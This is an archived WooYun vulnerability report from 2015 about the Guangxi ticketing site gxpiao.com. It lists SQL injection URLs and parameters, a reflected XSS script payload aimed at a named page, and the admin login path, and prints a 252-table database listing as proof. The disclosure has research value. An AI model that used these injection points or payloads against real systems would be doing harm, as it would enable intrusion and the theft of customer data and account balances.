漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0110881
漏洞标题:广西票务网注射漏洞+反射型XSS漏洞,百万数据泄露大量账号有余额可消费
相关厂商:广西票务网
漏洞作者: 路人甲
提交时间:2015-04-29 21:15
修复时间:2015-06-13 21:16
公开时间:2015-06-13 21:16
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-13: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
注入漏洞 XSS漏洞 用户数据泄露
详细说明:
注入点:
http://www.gxpiao.com/Movie_page1.aspx?dyyid=1
http://www.gxpiao.com/Movie_page2.aspx?dybm=1
反射型XSS漏洞:
http://www.gxpiao.com/Movie_page1.aspx?dyyid="><script>alert(/乌云/)</script>
后台
http://www.gxpiao.com/manage/login.aspx
漏洞证明:
商家名称
商家类型
密码
权限
用户名
Database: gxpwdb
[252 tables]
+----------------------------+
| AppDownInfo |
| AppFeedBack |
| AppMobileCount |
| AppMobileLog |
| AppMobileLogin |
| AppMobilePoLogin |
| AppPrizeList |
| AppPrizeRecord |
| AppPrizeUser |
| CM_CG_Fjb |
| CM_CG_Fpd |
| CM_CG_FpdMx |
| CM_CG_SpcfMx |
| CM_CG_Spcfd |
| CM_CG_Sppc |
| CM_CG_SpzzMx |
| CM_CG_Spzzd |
| CM_CG_dd |
| CM_CG_ddMx |
| CM_CG_fkd |
| CM_CG_fkdMx |
| CM_CG_pdd |
| CM_CG_pddMx |
| CM_CG_thd |
| CM_CG_thdMx |
| CM_CK_CkdMx |
| CM_CK_Ckdb |
| CM_CK_Rkdb |
| CM_CK_Yj |
| CM_CK_ckd |
| CM_CK_dbd |
| CM_CK_dbdMx |
| CM_CK_rkd |
| CM_CK_rkdMx |
| CM_CW_Gdzcgl |
| CM_CW_Zcd |
| CM_CW_Zjsrd |
| CM_CW_Zzd |
| CM_CW_cwkm |
| CM_Jxc_Gysfl |
| CM_Jxc_Gysxx |
| CM_Jxc_Khfl |
| CM_Jxc_Khxx |
| CM_Jxc_Spfzb |
| CM_Jxc_Splb |
| CM_Jxc_Spxx |
| CM_Jxc_Spzzb |
| CM_OA_Bwl |
| CM_OA_Skk |
| CM_OA_Ss |
| CM_OA_Ssap |
| CM_OA_Ssfj |
| CM_OA_Txfs |
| CM_OA_Ygssb |
| CM_Qt_XS_Hyjfkj |
| CM_Qt_XS_Hykjb |
| CM_Qt_XS_Hykzl |
| CM_Qt_XS_Khda |
| CM_Qt_XS_Qtjjb |
| CM_Qt_XS_Qtth |
| CM_Qt_XS_QtthMx |
| CM_Qt_XS_Qtxs |
| CM_Qt_XS_QtxsMx |
| CM_Qt_XS_Qtxsdp |
| CM_XS_Fpd |
| CM_XS_FpdMx |
| CM_XS_Kpd |
| CM_XS_KpdMx |
| CM_XS_xsckd |
| CM_XS_xsckdMx |
| CM_XS_xsdd |
| CM_XS_xsddMx |
| CM_XS_xsskd |
| CM_XS_xsskdMx |
| CM_XS_xsthd |
| CM_XS_xsthdMx |
| CM_Xtrz |
| CM_Xtrzxm |
| CM_Yj_Gyszkye |
| CM_Yj_Khzkyj |
| CM_ZtManagement |
| D99_CMD |
| D99_Tmp |
| JC_Airport |
| Jb_Rygw |
| Jc_Bm |
| Jc_Button |
| Jc_Ck |
| Jc_Dw |
| Jc_Dy_CK_Bm |
| Jc_Dy_Menu_Button |
| Jc_Dy_Role_System |
| Jc_Dy_Users_Gw |
| Jc_Dy_Users_Role |
| Jc_GnWeb |
| Jc_Jmgxx |
| Jc_Kjqj |
| Jc_Mj |
| Jc_Role |
| Jc_Ryda |
| Jc_Rygwb |
| Jc_System |
| Jc_SystemMenu |
| Jc_Users |
| Jc_Xtcs |
| Jc_YhGzzm |
| Jc_YhZc |
| Jc_airtype |
| M_Advertis |
| M_AdvertisType |
| M_AgenPrice |
| M_ApplyDetailTable |
| M_ApplyTable |
| M_Area |
| M_Code |
| M_Cuxiao |
| M_Ddlczt |
| M_Ddlczt_bak |
| M_Ddzt |
| M_Fapiao |
| M_Fenxiao_Mb |
| M_Fenxiao_Mb_Mx |
| M_Fenxiao_log |
| M_Fenxiao_sjjg |
| M_Flight |
| M_HomePageCfg_UnWork |
| M_HomePageCfg_UnWork2 |
| M_HomePageCfg_Working |
| M_HomePageCfg_Working2 |
| M_HotelInfo |
| M_HotelInfo_JD |
| M_HotelInfo_JD_Mx |
| M_HotelInfo_Mx |
| M_Integral |
| M_Member |
| M_Member_bank |
| M_Menpiao |
| M_Menpiao_Mx |
| M_Menpiao_hd |
| M_Movie |
| M_MovieSite |
| M_MovieTicket |
| M_MovieTime |
| M_Movie_Mx |
| M_Perform |
| M_Perform_Config |
| M_Perform_cc |
| M_Perfrom_JD |
| M_Perfrom_JD_MX |
| M_Perfrom_jw |
| M_Perfrom_yccg |
| M_Psfs |
| M_QA |
| M_SecondBuy |
| M_Spdz |
| M_Splike |
| M_Substation |
| M_UserCollect |
| M_Voucher |
| M_Voucher_MX |
| M_Xianlu_hd |
| M_Zcsx |
| M_about |
| M_airline_JD |
| M_airline_JD_Mx |
| M_airline_JD_PNR |
| M_airline_Xx |
| M_codeMachine |
| M_dianzipiao |
| M_dianzipiao_Mx |
| M_hotSearch |
| M_inMoney |
| M_member_money |
| M_member_moneyCash |
| M_member_value |
| M_menpiao_JD |
| M_menpiao_JD2 |
| M_menpiao_JD_Mx |
| M_menpiao_JD_Mx2 |
| M_merchant |
| M_merchant_group |
| M_merchant_user |
| M_message |
| M_mooncake |
| M_mooncake_Dst |
| M_mooncake_FL |
| M_mooncake_JD |
| M_mooncake_JD_MX |
| M_movieTicket_JD |
| M_movieTicket_JD_Mx |
| M_project |
| M_qpdj |
| M_subject |
| M_telList |
| M_xianlu |
| M_xianlu_JD |
| M_xianlu_JD_Mx |
| M_xianlu_Mx |
| M_xianlu_back |
| M_ycyd |
| NFCUser |
| N_News |
| SMS |
| SMS_MO |
| SMS_MO_meeting |
| SMS_meeting |
| Sys_Table_No |
| UV_CM_CG_dd |
| UV_CM_CG_rkd |
| UV_CM_GnQx |
| UV_Fenxiao_MX |
| UV_GXPW_Pay |
| UV_Jc_Users |
| UV_Menu_Button |
| UV_Moon_Pay |
| UV_MovieTicket_JD |
| UV_MovieTicket_Time |
| UV_Order_recycling |
| UV_Perform_Phone |
| UV_Perfrom_JD |
| UV_Ry |
| UV_Splb_Spxx |
| UV_Spxx_Spfzb |
| UV_User_Orders |
| UV_User_menpiao |
| UV_User_xianlu |
| UV_Users_Role |
| UV_airticket |
| UV_airticket_caiwu |
| UV_menpiao_JD_Count_report |
| UV_menpiao_JD_report |
| UV_menpiao_jd_fenxiao |
| UV_message |
| UV_perform_All |
| UV_perform_cg |
| UV_perfrom_jd_MX |
| UV_user_mooncake |
| UV_user_qpdj |
| View_1 |
| View_2 |
| View_3 |
| View_ycmc |
| View_商家账号
| W_JingDian_OnlineCfg |
| W_SUBSTATION_CFG |
| W_SubStation_Pos |
| YoungTb |
| audit_table |
| buser |
| errCode |
| m_JD_number |
| vM_menpiao_hd |
+----------------------------+
修复方案:
过滤过滤。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)